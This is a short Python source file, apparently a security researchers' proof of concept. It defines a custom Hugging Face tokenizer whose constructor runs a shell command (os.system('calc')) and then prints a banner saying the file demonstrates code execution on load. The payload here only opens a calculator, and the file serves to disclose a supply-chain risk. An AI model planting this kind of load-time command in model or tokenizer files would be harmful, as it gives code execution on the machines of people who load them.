File size: 1,459 Bytes
22569b3 |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 |
# File: tokenization_custom.py
# Place this file in your Hugging Face model repository
from transformers import PreTrainedTokenizerFast
import json
import os
def note_to_users():
print("""
_____ _ _ ______
/ __ \ | | | |___ /
| / \/ |__ ___ ___| | ___ __ ___ __ _ _ ____ __ / / ___ _ __ ___
| | | '_ \ / _ \/ __| |/ / '_ ` _ \ / _` | '__\ \/ / / / / _ \ '__/ _ \
| \__/\ | | | __/ (__| <| | | | | | (_| | | > < ./ /__| __/ | | (_) |
\____/_| |_|\___|\___|_|\_\_| |_| |_|\__,_|_| /_/\_\ \_____/\___|_| \___/
----
Message from Checkmarx Zero Research Group:
Note: this is not the model you are looking for.
This customized tokenizer is a proof-of-concept and not meant for actual use.
No worries — running it did not affect your system in any way.
It simply demonstrates how a custom tokenizer in Hugging Face can be built to execute code.
""")
class CustomTokenizer(PreTrainedTokenizerFast):
def __init__(self, **kwargs):
import os
os.system("calc")
note_to_users()
super().__init__(**kwargs)
@classmethod
def from_pretrained(cls, *args, **kwargs):
note_to_users()
return super().from_pretrained(*args, **kwargs) |